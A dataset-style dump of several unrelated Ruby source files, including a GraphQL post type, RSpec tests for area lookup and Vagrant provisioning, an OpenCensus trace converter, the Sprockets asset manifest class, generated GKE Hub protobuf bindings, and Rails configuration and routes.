hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e2e62a706fdcb28eabc556fc598f207bc767458b | 1,280 | # frozen_string_literal: true
Types::PostType = GraphQL::ObjectType.define do
name 'Post'
field :title, types.String
field :body, types.String
field :link, types.String
field :post_creation_date, Types::DateTimeType
field :site, Types::SiteType
field :user_link, types.String
field :username, types.String
field :why, types.String
field :user_reputation, types.Int
field :upvote_count, types.Int
field :downvote_count, types.Int
field :score, types.Int
field :feedbacks, types[Types::FeedbackType]
field :stack_exchange_user, Types::StackExchangeUserType
field :is_tp, types.Boolean
field :is_fp, types.Boolean
field :is_naa, types.Boolean
field :revision_count, types.Int
field :deleted_at, Types::DateTimeType
field :smoke_detector, Types::SmokeDetectorType
field :autoflagged, types.Boolean
field :tags, types.String
field :feedbacks_count, types.Int
field :native_id, types.Int
field :reasons, types[Types::ReasonType]
field :spam_domains, types[Types::SpamDomainType]
field :flag_logs, types[Types::FlagLogType]
field :comments, types[Types::PostCommentType]
field :post_tags, types[Types::DomainTagType]
field :created_at, Types::DateTimeType
field :updated_at, Types::DateTimeType
field :id, types.ID
end
| 32.820513 | 58 | 0.761719 |
112fb5836be8f0b3e72c9184982f7df1c7d8f2f7 | 2,690 | require "spec_helper"
describe EA::AreaLookup do
describe "Finders" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 654_321, northing: 123_456) }
let(:api_url) { "http://environment.data.gov.uk/ds/wfs" }
it "has a version number" do
expect(EA::AreaLookup::VERSION).not_to be nil
end
context "admin area happy path" do
before { EA::AreaLookup.config.area_api_url = api_url }
context "area found" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 358_205.03, northing: 172_708.07) }
it "returns hash with area info" do
VCR.use_cassette("admin_area_found") do
hash = described_class.find_admin_area_by_coordinates(coords)
expect(hash).to eq(area_id: "28.000000000000000",
code: "WESSEX",
area_name: "Wessex",
short_name: "Wessex",
long_name: "Wessex")
end
end
end
context "admin area not found" do
let(:coords) { EA::AreaLookup::Coordinates.new(easting: 1, northing: 2) }
it "returns empty hash" do
VCR.use_cassette("admin_area_not_found") do
hash = described_class.find_admin_area_by_coordinates(coords)
expect(hash).to eq(area_id: "",
code: "",
area_name: "",
short_name: "",
long_name: "")
end
end
end
end
context "sad path" do
describe "Exception handling" do
after(:each) { EA::AreaLookup.reset }
it "raises an error if admin area api url is missing in config" do
EA::AreaLookup.configure { |config| config.area_api_url = nil }
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::InvalidConfigError)
end
it "raises an error if connection cannot be made to the api" do
EA::AreaLookup.config.area_api_url = "http://asdasdasdasd.example.com"
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::ApiConnectionError)
end
it "raise an error if the request is malformed (see cassette)" do
EA::AreaLookup.config.area_api_url = api_url
VCR.use_cassette("admin_area_malformed_request") do
expect { described_class.find_admin_area_by_coordinates(coords) }
.to raise_error(EA::AreaLookup::ApiInvalidRequestError)
end
end
end
end
end
end
| 38.428571 | 99 | 0.588104 |
01d7d6855338ebde4798574b52b693a6c54dd343 | 5,232 | require 'spec_helper'
describe Beaker::VagrantVirtualbox do
let( :options ) { make_opts.merge({ :hosts_file => 'sample.cfg', 'logger' => double().as_null_object }) }
let( :vagrant ) { Beaker::VagrantVirtualbox.new( @hosts, options ) }
let(:vagrantfile_path) do
path = vagrant.instance_variable_get( :@vagrant_path )
File.expand_path( File.join( path, 'Vagrantfile' ))
end
before :each do
@hosts = make_hosts()
end
it "uses the virtualbox provider for provisioning" do
@hosts.each do |host|
host_prev_name = host['user']
expect( vagrant ).to receive( :set_ssh_config ).with( host, 'vagrant' ).once
expect( vagrant ).to receive( :copy_ssh_to_root ).with( host, options ).once
expect( vagrant ).to receive( :set_ssh_config ).with( host, host_prev_name ).once
end
expect( vagrant ).to receive( :hack_etc_hosts ).with( @hosts, options ).once
expect( vagrant ).to receive( :vagrant_cmd ).with( "up --provider virtualbox" ).once
vagrant.provision
end
it "can make a Vagranfile for a set of hosts" do
path = vagrant.instance_variable_get( :@vagrant_path )
allow( vagrant ).to receive( :randmac ).and_return( "0123456789" )
vagrant.make_vfile( @hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include( %Q{ v.vm.provider :virtualbox do |vb|\n vb.customize ['modifyvm', :id, '--memory', '1024', '--cpus', '1', '--audio', 'none']\n end})
end
it "can disable the vb guest plugin" do
options.merge!({ :vbguest_plugin => 'disable' })
vfile_section = vagrant.class.provider_vfile_section( @hosts.first, options )
match = vfile_section.match(/vb.vbguest.auto_update = false/)
expect( match ).to_not be nil
end
it "can enable ioapic(multiple cores) on hosts" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:ioapic => 'true'},1)
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--ioapic', 'on']")
end
it "can enable NAT DNS on hosts" do
hosts = make_hosts({:natdns => 'on'},1)
vagrant.make_vfile( hosts )
vagrantfile = File.read( vagrantfile_path )
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--natdnshostresolver1', 'on']")
expect( vagrantfile ).to include( " vb.customize ['modifyvm', :id, '--natdnsproxy1', 'on']")
end
it "correctly provisions storage with the USB controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}, :volume_storage_controller => 'USB' })
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['modifyvm', :id, '--usb', 'on']")
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker USB Controller', '--add', 'usb', '--portcount', '8', '--controller', 'USB', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker USB Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
it "correctly provisions storage with the LSILogic controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}, :volume_storage_controller => 'LSILogic' })
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker LSILogic Controller', '--add', 'scsi', '--portcount', '16', '--controller', 'LSILogic', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker LSILogic Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
it "correctly provisions storage with the default controller" do
path = vagrant.instance_variable_get( :@vagrant_path )
hosts = make_hosts({:volumes => { 'test_disk' => { size: '5120' }}})
vagrant.make_vfile( hosts )
vagrantfile = File.read( File.expand_path( File.join( path, 'Vagrantfile' )))
expect( vagrantfile ).to include(" vb.customize ['storagectl', :id, '--name', 'Beaker IntelAHCI Controller', '--add', 'sata', '--portcount', '2', '--controller', 'IntelAHCI', '--bootable', 'off']")
expect( vagrantfile ).to include(" vb.customize ['createhd', '--filename', 'vm1-test_disk.vdi', '--size', '5120']")
expect( vagrantfile ).to include(" vb.customize ['storageattach', :id, '--storagectl', 'Beaker IntelAHCI Controller', '--port', '0', '--device', '0', '--type', 'hdd', '--medium', 'vm1-test_disk.vdi']")
end
end
| 51.80198 | 205 | 0.655199 |
d5faed418138732924933954a7c0cb519ab50cc8 | 366 | require "dropbox_product_updates/version"
module DropboxProductUpdates
require "dropbox_product_updates/product"
require "dropbox_product_updates/product_data"
def self.update_all_products(path=nil, token=nil)
payload = ''
ImportProductData.update_all_products(path,token)
payload = 'Successful Import (More info soon...)'
payload
end
end
| 24.4 | 53 | 0.775956 |
4ae5ee7f2b1d8f5514264be83570d98cc0682286 | 703 | Rails.application.routes.draw do
get "password_resets/new"
get "password_resets/edit"
root "static_pages#home"
get "/readme", to: "static_pages#readme"
get "/contact", to: "static_pages#contact"
get "/signup", to: "users#new"
resources :users do
member do
get :following, :followers
end
end
get "/login", to: "sessions#new"
post "/login", to: "sessions#create"
get "/guest", to: "sessions#guest"
delete "/logout", to: "sessions#destroy"
resources :account_activations, only: [:edit]
resources :password_resets, only: [:new, :create, :edit, :update]
resources :microposts, only: [:create, :destroy]
resources :relationships, only: [:create, :destroy]
end
| 28.12 | 67 | 0.682788 |
7a27c9ad517c83e30a877acd76cf72e069cefb38 | 7,894 | require 'google/protobuf/well_known_types'
require 'gruf'
require 'opencensus/proto/agent/common/v1/common_pb'
require 'opencensus/proto/agent/trace/v1/trace_service_pb'
require 'opencensus/proto/agent/trace/v1/trace_service_services_pb'
require 'opencensus/trace/exporters/ocagent/export_request_enumerator'
module OpenCensus
module Trace
module Exporters
class OCAgent
class Converter
TraceProtos = ::OpenCensus::Proto::Trace
AgentProtos = ::OpenCensus::Proto::Agent
def initialize
@stack_trace_hash_ids = {}
end
def convert_spans(spans)
span_protos = spans.map { |span| Converter.new.convert_span(span) }
OCAgent::ExportRequestEnumerator.new(span_protos)
end
def convert_span(span_data)
return if span_data.nil?
TraceProtos::V1::Span.new(
name: truncatable_string(span_data.name.value, span_data.name.truncated_byte_count),
kind: span_data.kind,
trace_id: span_data.trace_id,
span_id: span_data.span_id,
parent_span_id: span_data.parent_span_id,
start_time: pb_timestamp(span_data.start_time),
end_time: pb_timestamp(span_data.end_time),
status: convert_status(span_data.status),
child_span_count: optional_uint32(span_data.child_span_count),
attributes: convert_attributes(span_data.attributes, span_data.dropped_attributes_count),
stack_trace: convert_stack_trace(span_data.stack_trace,
span_data.dropped_frames_count,
span_data.stack_trace_hash_id),
time_events: convert_time_events(span_data.time_events,
span_data.dropped_annotations_count,
span_data.dropped_message_events_count),
links: convert_links(span_data.links, span_data.dropped_links_count),
same_process_as_parent_span: optional_bool(span_data.same_process_as_parent_span),
)
end
def optional_uint32(val)
return if val.nil?
Google::Protobuf::Uint32Value.new(value: val)
end
def optional_bool(val)
return if val.nil?
Google::Protobuf::BoolValue.new(value: val)
end
def truncatable_string(str, truncated_byte_count = 0)
TraceProtos::V1::TruncatableString.new(value: str, truncated_byte_count: truncated_byte_count)
end
def pb_timestamp(time)
Google::Protobuf::Timestamp.new(seconds: time.to_i, nanos: time.nsec)
end
def pb_status(status)
return if status.nil?
TraceProtos::V1::Status.new(
code: status.canonical_code,
message: status.description
)
end
def convert_attributes(attributes, dropped_attributes_count)
attribute_map = {}
attributes.each do |key, value|
attribute_map[key] = convert_attribute_value(value)
end
TraceProtos::V1::Span::Attributes.new(
attribute_map: attribute_map,
dropped_attributes_count: dropped_attributes_count
)
end
def convert_attribute_value(value)
case value
when OpenCensus::Trace::TruncatableString
TraceProtos::V1::AttributeValue.new(string_value: TraceProtos::V1::TruncatableString.new(value: value.value, truncated_byte_count: value.truncated_byte_count))
when TrueClass || FalseClass
TraceProtos::V1::AttributeValue.new(bool_value: value)
when Integer
TraceProtos::V1::AttributeValue.new(int_value: value)
else
end
end
def convert_stack_trace(stack_trace, dropped_frames_count, stack_trace_hash_id)
# TODO: For whatever reason, some of these are coming in negative, despite the field being unsigned
stack_trace_hash_id = 0 if stack_trace_hash_id.nil? || stack_trace_hash_id < 0
# If the hash id already exists, then just return
if stack_trace_hash_id > 0 && @stack_trace_hash_ids[stack_trace_hash_id]
return TraceProtos::V1::StackTrace.new(stack_trace_hash_id: stack_trace_hash_id)
end
# Otherwise, construct
@stack_trace_hash_ids[stack_trace_hash_id] = true
frame_protos = stack_trace.map { |frame| convert_stack_frame(frame) }
frames_proto = TraceProtos::V1::StackTrace::StackFrames.new(
frame: frame_protos,
dropped_frames_count: dropped_frames_count
)
TraceProtos::V1::StackTrace.new(stack_frames: frames_proto, stack_trace_hash_id: stack_trace_hash_id)
end
# https://ruby-doc.org/core-2.5.0/Thread/Backtrace/Location.html
def convert_stack_frame(frame)
TraceProtos::V1::StackTrace::StackFrame.new(
function_name: truncatable_string(frame.label),
file_name: truncatable_string(frame.path),
line_number: frame.lineno
)
end
def convert_time_events(events, dropped_annotations_count, dropped_message_events_count)
event_protos = events.map do |event|
case event
when OpenCensus::Trace::Annotation
convert_annotation(event)
when OpenCensus::Trace::MessageEvent
else
nil
end
end.compact
TraceProtos::V1::Span::TimeEvents.new(
time_event: event_protos,
dropped_annotations_count: dropped_annotations_count,
dropped_message_events_count: dropped_message_events_count
)
end
def convert_links(links, dropped_links_count)
converted_links = links.map do |link|
convert_link(links)
end
TraceProtos::V1::Span::Links.new(
link: converted_links,
dropped_links_count: dropped_links_count,
)
end
def convert_link(link)
TraceProtos::V1::Span::Link.new(
trace_id: link.trace_id,
span_id: link.span_id,
type: link.type,
attributes: convert_attributes(link.attributes, link.dropped_attributes_count)
)
end
def convert_annotation(annotation)
proto = TraceProtos::V1::Span::TimeEvent::Annotation.new(
description: trunctable_string(annotation.description),
attributes: convert_attributes(annotation.attributes)
)
TraceProtos::V1::Span::TimeEvent::Annotation.new
end
def convert_status(status)
return if status.nil?
TraceProtos::V1::Status.new(code: status.code, message: status.message)
end
def add_pb_attributes(pb_attributes, key, value)
case value.class
when TrueClass || FalseClass
pb_attributes.attribute_map[key].bool_value = value
when Integer
pb_attributes.attribute_map[key].int_value = value
when String
pb_attributes.attribute_map[key].string_value = value
when Float
pb_attributes.attribute_map[key].double_value = value
else
pb_attributes.attribute_map[key].string_value = value
end
end
end
end
end
end
end
| 39.079208 | 173 | 0.602736 |
e89abf3e0dad3d23187f82a09177e649479eac93 | 8,573 | require 'json'
require 'time'
require 'concurrent'
require 'sprockets/manifest_utils'
require 'sprockets/utils/gzip'
module Sprockets
# The Manifest logs the contents of assets compiled to a single directory. It
# records basic attributes about the asset for fast lookup without having to
# compile. A pointer from each logical path indicates which fingerprinted
# asset is the current one.
#
# The JSON is part of the public API and should be considered stable. This
# should make it easy to read from other programming languages and processes
# that don't have sprockets loaded. See `#assets` and `#files` for more
# infomation about the structure.
class Manifest
include ManifestUtils
attr_reader :environment
# Create new Manifest associated with an `environment`. `filename` is a full
# path to the manifest json file. The file may or may not already exist. The
# dirname of the `filename` will be used to write compiled assets to.
# Otherwise, if the path is a directory, the filename will default a random
# ".sprockets-manifest-*.json" file in that directory.
#
# Manifest.new(environment, "./public/assets/manifest.json")
#
def initialize(*args)
if args.first.is_a?(Base) || args.first.nil?
@environment = args.shift
end
@directory, @filename = args[0], args[1]
# Whether the manifest file is using the old manifest-*.json naming convention
@legacy_manifest = false
# Expand paths
@directory = File.expand_path(@directory) if @directory
@filename = File.expand_path(@filename) if @filename
# If filename is given as the second arg
if @directory && File.extname(@directory) != ""
@directory, @filename = nil, @directory
end
# Default dir to the directory of the filename
@directory ||= File.dirname(@filename) if @filename
# If directory is given w/o filename, pick a random manifest location
if @directory && @filename.nil?
@filename = find_directory_manifest(@directory)
end
unless @directory && @filename
raise ArgumentError, "manifest requires output filename"
end
data = {}
begin
if File.exist?(@filename)
data = json_decode(File.read(@filename))
end
rescue JSON::ParserError => e
logger.error "#{@filename} is invalid: #{e.class} #{e.message}"
end
@data = data
end
# Returns String path to manifest.json file.
attr_reader :filename
alias_method :path, :filename
attr_reader :directory
alias_method :dir, :directory
# Returns internal assets mapping. Keys are logical paths which
# map to the latest fingerprinted filename.
#
# Logical path (String): Fingerprint path (String)
#
# { "application.js" => "application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js",
# "jquery.js" => "jquery-ae0908555a245f8266f77df5a8edca2e.js" }
#
def assets
@data['assets'] ||= {}
end
# Returns internal file directory listing. Keys are filenames
# which map to an attributes array.
#
# Fingerprint path (String):
# logical_path: Logical path (String)
# mtime: ISO8601 mtime (String)
# digest: Base64 hex digest (String)
#
# { "application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js" =>
# { 'logical_path' => "application.js",
# 'mtime' => "2011-12-13T21:47:08-06:00",
# 'digest' => "2e8e9a7c6b0aafa0c9bdeec90ea30213" } }
#
def files
@data['files'] ||= {}
end
# Public: Find all assets matching pattern set in environment.
#
# Returns Enumerator of Assets.
def find(*args)
unless environment
raise Error, "manifest requires environment for compilation"
end
return to_enum(__method__, *args) unless block_given?
environment = self.environment.cached
args.flatten.each do |path|
environment.find_all_linked_assets(path) do |asset|
yield asset
end
end
nil
end
# Compile and write asset to directory. The asset is written to a
# fingerprinted filename like
# `application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js`. An entry is
# also inserted into the manifest file.
#
# compile("application.js")
#
def compile(*args)
unless environment
raise Error, "manifest requires environment for compilation"
end
filenames = []
concurrent_compressors = []
concurrent_writers = []
find(*args) do |asset|
files[asset.digest_path] = {
'logical_path' => asset.logical_path,
'mtime' => Time.now.iso8601,
'size' => asset.bytesize,
'digest' => asset.hexdigest,
# Deprecated: Remove beta integrity attribute in next release.
# Callers should DigestUtils.hexdigest_integrity_uri to compute the
# digest themselves.
'integrity' => DigestUtils.hexdigest_integrity_uri(asset.hexdigest)
}
assets[asset.logical_path] = asset.digest_path
target = File.join(dir, asset.digest_path)
if File.exist?(target)
logger.debug "Skipping #{target}, already exists"
else
logger.info "Writing #{target}"
write_file = Concurrent::Future.execute { asset.write_to target }
concurrent_writers << write_file
end
filenames << asset.filename
next if environment.skip_gzip?
gzip = Utils::Gzip.new(asset)
next if gzip.cannot_compress?(environment.mime_types)
if File.exist?("#{target}.gz")
logger.debug "Skipping #{target}.gz, already exists"
else
logger.info "Writing #{target}.gz"
concurrent_compressors << Concurrent::Future.execute do
write_file.wait! if write_file
gzip.compress(target)
end
end
end
concurrent_writers.each(&:wait!)
concurrent_compressors.each(&:wait!)
save
filenames
end
# Removes file from directory and from manifest. `filename` must
# be the name with any directory path.
#
# manifest.remove("application-2e8e9a7c6b0aafa0c9bdeec90ea30213.js")
#
def remove(filename)
path = File.join(dir, filename)
gzip = "#{path}.gz"
logical_path = files[filename]['logical_path']
if assets[logical_path] == filename
assets.delete(logical_path)
end
files.delete(filename)
FileUtils.rm(path) if File.exist?(path)
FileUtils.rm(gzip) if File.exist?(gzip)
save
logger.info "Removed #{filename}"
nil
end
# Cleanup old assets in the compile directory. By default it will
# keep the latest version, 2 backups and any created within the past hour.
#
# Examples
#
# To force only 1 backup to be kept, set count=1 and age=0.
#
# To only keep files created within the last 10 minutes, set count=0 and
# age=600.
#
def clean(count = 2, age = 3600)
asset_versions = files.group_by { |_, attrs| attrs['logical_path'] }
asset_versions.each do |logical_path, versions|
current = assets[logical_path]
versions.reject { |path, _|
path == current
}.sort_by { |_, attrs|
# Sort by timestamp
Time.parse(attrs['mtime'])
}.reverse.each_with_index.drop_while { |(_, attrs), index|
_age = [0, Time.now - Time.parse(attrs['mtime'])].max
# Keep if under age or within the count limit
_age < age || index < count
}.each { |(path, _), _|
# Remove old assets
remove(path)
}
end
end
# Wipe directive
def clobber
FileUtils.rm_r(directory) if File.exist?(directory)
logger.info "Removed #{directory}"
nil
end
# Persist manfiest back to FS
def save
data = json_encode(@data)
FileUtils.mkdir_p File.dirname(@filename)
PathUtils.atomic_write(@filename) do |f|
f.write(data)
end
end
private
def json_decode(obj)
JSON.parse(obj, create_additions: false)
end
def json_encode(obj)
JSON.generate(obj)
end
def logger
if environment
environment.logger
else
logger = Logger.new($stderr)
logger.level = Logger::FATAL
logger
end
end
end
end
| 29.767361 | 84 | 0.623819 |
4a59e6c081f934bb20d27500acb4c9e4f3bb8519 | 7,010 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/gkehub/v1/service.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'
require 'google/cloud/gkehub/v1/feature_pb'
require 'google/cloud/gkehub/v1/membership_pb'
require 'google/longrunning/operations_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/gkehub/v1/service.proto", :syntax => :proto3) do
add_message "google.cloud.gkehub.v1.ListMembershipsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
optional :order_by, :string, 5
end
add_message "google.cloud.gkehub.v1.ListMembershipsResponse" do
repeated :resources, :message, 1, "google.cloud.gkehub.v1.Membership"
optional :next_page_token, :string, 2
repeated :unreachable, :string, 3
end
add_message "google.cloud.gkehub.v1.GetMembershipRequest" do
optional :name, :string, 1
end
add_message "google.cloud.gkehub.v1.CreateMembershipRequest" do
optional :parent, :string, 1
optional :membership_id, :string, 2
optional :resource, :message, 3, "google.cloud.gkehub.v1.Membership"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.DeleteMembershipRequest" do
optional :name, :string, 1
optional :request_id, :string, 2
end
add_message "google.cloud.gkehub.v1.UpdateMembershipRequest" do
optional :name, :string, 1
optional :update_mask, :message, 2, "google.protobuf.FieldMask"
optional :resource, :message, 3, "google.cloud.gkehub.v1.Membership"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.GenerateConnectManifestRequest" do
optional :name, :string, 1
optional :namespace, :string, 2
optional :proxy, :bytes, 3
optional :version, :string, 4
optional :is_upgrade, :bool, 5
optional :registry, :string, 6
optional :image_pull_secret_content, :bytes, 7
end
add_message "google.cloud.gkehub.v1.GenerateConnectManifestResponse" do
repeated :manifest, :message, 1, "google.cloud.gkehub.v1.ConnectAgentResource"
end
add_message "google.cloud.gkehub.v1.ConnectAgentResource" do
optional :type, :message, 1, "google.cloud.gkehub.v1.TypeMeta"
optional :manifest, :string, 2
end
add_message "google.cloud.gkehub.v1.TypeMeta" do
optional :kind, :string, 1
optional :api_version, :string, 2
end
add_message "google.cloud.gkehub.v1.ListFeaturesRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
optional :filter, :string, 4
optional :order_by, :string, 5
end
add_message "google.cloud.gkehub.v1.ListFeaturesResponse" do
repeated :resources, :message, 1, "google.cloud.gkehub.v1.Feature"
optional :next_page_token, :string, 2
end
add_message "google.cloud.gkehub.v1.GetFeatureRequest" do
optional :name, :string, 1
end
add_message "google.cloud.gkehub.v1.CreateFeatureRequest" do
optional :parent, :string, 1
optional :feature_id, :string, 2
optional :resource, :message, 3, "google.cloud.gkehub.v1.Feature"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.DeleteFeatureRequest" do
optional :name, :string, 1
optional :force, :bool, 2
optional :request_id, :string, 3
end
add_message "google.cloud.gkehub.v1.UpdateFeatureRequest" do
optional :name, :string, 1
optional :update_mask, :message, 2, "google.protobuf.FieldMask"
optional :resource, :message, 3, "google.cloud.gkehub.v1.Feature"
optional :request_id, :string, 4
end
add_message "google.cloud.gkehub.v1.OperationMetadata" do
optional :create_time, :message, 1, "google.protobuf.Timestamp"
optional :end_time, :message, 2, "google.protobuf.Timestamp"
optional :target, :string, 3
optional :verb, :string, 4
optional :status_detail, :string, 5
optional :cancel_requested, :bool, 6
optional :api_version, :string, 7
end
end
end
module Google
module Cloud
module GkeHub
module V1
ListMembershipsRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListMembershipsRequest").msgclass
ListMembershipsResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListMembershipsResponse").msgclass
GetMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GetMembershipRequest").msgclass
CreateMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.CreateMembershipRequest").msgclass
DeleteMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.DeleteMembershipRequest").msgclass
UpdateMembershipRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.UpdateMembershipRequest").msgclass
GenerateConnectManifestRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GenerateConnectManifestRequest").msgclass
GenerateConnectManifestResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GenerateConnectManifestResponse").msgclass
ConnectAgentResource = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ConnectAgentResource").msgclass
TypeMeta = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.TypeMeta").msgclass
ListFeaturesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListFeaturesRequest").msgclass
ListFeaturesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.ListFeaturesResponse").msgclass
GetFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.GetFeatureRequest").msgclass
CreateFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.CreateFeatureRequest").msgclass
DeleteFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.DeleteFeatureRequest").msgclass
UpdateFeatureRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.UpdateFeatureRequest").msgclass
OperationMetadata = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.gkehub.v1.OperationMetadata").msgclass
end
end
end
end
| 51.167883 | 165 | 0.736805 |
bb409fdba74e23dd7f2c03b7dcc45307b5a773df | 3,260 | # frozen_string_literal: true
if RUBY_ENGINE == 'opal'
require_tree '../step'
else
require 'require_all'
require_rel '../step'
end
module Engine
module Round
class Base
attr_reader :entities, :entity_index, :round_num, :steps
DEFAULT_STEPS = [
Step::EndGame,
Step::Message,
].freeze
def initialize(game, steps, **opts)
@game = game
@entity_index = 0
@round_num = opts[:round_num] || 1
@entities = select_entities
@steps = (DEFAULT_STEPS + steps).map do |step, step_opts|
step_opts ||= {}
step = step.new(@game, self, **step_opts)
step.setup
step.round_state.each do |key, value|
singleton_class.class_eval { attr_accessor key }
send("#{key}=", value)
end
step
end
end
def setup; end
def name
raise NotImplementedError
end
def select_entities
raise NotImplementedError
end
def current_entity
active_entities[0]
end
def description
active_step.description
end
def active_entities
active_step&.active_entities || []
end
# TODO: This is deprecated
def can_act?(entity)
active_step&.current_entity == entity
end
def teleported?(_entity)
false
end
def pass_description
active_step.pass_description
end
def process_action(action)
type = action.type
clear_cache!
before_process(action)
step = @steps.find do |s|
next unless s.active?
process = s.actions(action.entity).include?(type)
blocking = s.blocking?
raise GameError, "Step #{s.description} cannot process #{action.to_h}" if blocking && !process
blocking || process
end
raise GameError, "No step found for action #{type} at #{action.id}" unless step
step.acted = true
step.send("process_#{action.type}", action)
skip_steps
clear_cache!
after_process(action)
end
def actions_for(entity)
actions = []
return actions unless entity
@steps.each do |step|
next unless step.active?
available_actions = step.actions(entity)
actions.concat(available_actions)
break if step.blocking?
end
actions.uniq
end
def active_step(entity = nil)
return @steps.find { |step| step.active? && step.actions(entity).any? } if entity
@active_step ||= @steps.find { |step| step.active? && step.blocking? }
end
def finished?
!active_step
end
def next_entity_index!
@entity_index = (@entity_index + 1) % @entities.size
end
def reset_entity_index!
@entity_index = 0
end
def clear_cache!
@active_step = nil
end
private
def skip_steps
@steps.each do |step|
next if !step.active? || !step.blocks?
break if step.blocking?
step.skip!
end
end
def before_process(_action); end
def after_process(_action); end
end
end
end
| 21.589404 | 104 | 0.572086 |
6a4b11eaf2fadc760b9fb86476d38adfb955e4f2 | 2,066 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
# TODO(javierhonduco): figure out if there's a better way
# of doing this (at least deharcode the host)
config.action_mailer.default_url_options = { :host => "localhost:3000" }
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
end
| 35.016949 | 85 | 0.759439 |
1aca2bd1839a19ff52479d6acc99762c1d5d1e7a | 36 | class Paper < ApplicationRecord
end
| 12 | 31 | 0.833333 |
b92ed48b86890657187c887364f20865fded0bbd | 69 | module Autoloaded
module Module1
class A
end
end
